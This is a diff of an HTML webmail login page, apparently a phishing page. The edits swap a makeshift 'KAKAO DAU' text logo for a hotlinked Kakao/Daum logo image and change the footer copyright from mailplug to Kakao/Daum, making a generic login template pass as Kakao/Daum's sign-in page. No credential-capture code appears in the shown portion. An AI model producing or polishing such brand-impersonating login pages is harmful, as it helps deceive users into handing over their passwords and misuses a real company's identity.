--- a/mail 2.html
+++ b/mail 2.html
@@ -121,7 +121,7 @@ input[type='text'], input[type='password']{border: 2px solid #E9E9E9}
 #mb-auth-wrapper #mb-auth-account-area {display:flex; justify-content:space-between; font-size:14px; line-height:22px; color:#241E17;}
 #mb-auth-wrapper #mb-auth-account-area #rememberid {width:18px; height:18px; margin-right:5px; vertical-align:sub; cursor:pointer;}
 #mb-auth-wrapper #mb-auth-account-area input[type="checkbox"]{display:none;}
-#mb-auth-wrapper #mb-auth-account-area input[type="checkbox"] + label span{display:inline-block; width:18px; height:18px; margin-right:7p                                                                             Ax; background:url(/asset/wm60/images/login_CI/checkbox_checkbox.svg) no-repeat; vertical-align:sub; cursor:pointer;}
+#mb-auth-wrapper #mb-auth-account-area input[type="checkbox"] + label span{display:inline-block; width:18px; height:18px; margin-right:7px; background:url(/asset/wm60/images/login_CI/checkbox_checkbox.svg) no-repeat; vertical-align:sub; cursor:pointer;}
 #mb-auth-wrapper #mb-auth-account-area input[type="checkbox"] + label span:focus-visible{border: 1px solid #241E17;}
 #mb-auth-wrapper #mb-auth-account-area input[type="checkbox"]:checked + label span{display:inline-block; width:18px; height:18px; margin-right:7px; background:url(/asset/wm60/images/login_CI/checkbox_checked.svg) no-repeat; vertical-align:sub; cursor:pointer;}
 #mb-auth-wrapper #mb-auth-account-area #rememberid-label{cursor:pointer;}
@@ -1274,7 +1274,7 @@ html{background-image:none !important;overflow-y:auto !important;}
 			<div class="mb-auth-login-wrapper">
 				<div class="login " id="mb-auth-wrapper">
 					<div class="ellipsis" id="mb-auth-logo-area">
-KAKAO D<font color="#83f50a" style="background-color: rgb(0, 224, 0);"></font><font color="#ffa500"><font color="#83f50a" style="background-color: rgb(255, 255, 255);">A</font>U</font><font color="#e64019">&nbsp;&nbsp;&nbsp;</font>&nbsp;&nbsp;&nbsp;&nbsp;	
+<img width="140" style="width: 279px; height: 97px;" src="https://tse3-mm.cn.bing.net/th/id/OIP-C.VeJqji_dG4IpvxmiOIq_9gHaDK?w=344&amp;h=149&amp;c=7&amp;r=0&amp;o=5&amp;pid=1.7"><font color="#e64019">&nbsp;&nbsp;&nbsp;</font>&nbsp;&nbsp;&nbsp;&nbsp;	
 
 
 
@@ -1327,7 +1327,7 @@ KAKAO D<font color="#83f50a" style="background-color: rgb(0, 224, 0);"></font><f
 	</strong></div><strong>
 	<div class="mb-login-footer">
 			<div id="copyright">
-				<p>&copy; mailplug Inc. All rights reserved.</p>
+				<p>&copy;&nbsp;Kakao/Daum&nbsp;Inc. All rights reserved.</p>
 			</div>
 		<div class="mb-auth-lang-selector">
 			<div tabindex="0" class="mb-auth-lang" id="mb-auth-lang-selector-opener">
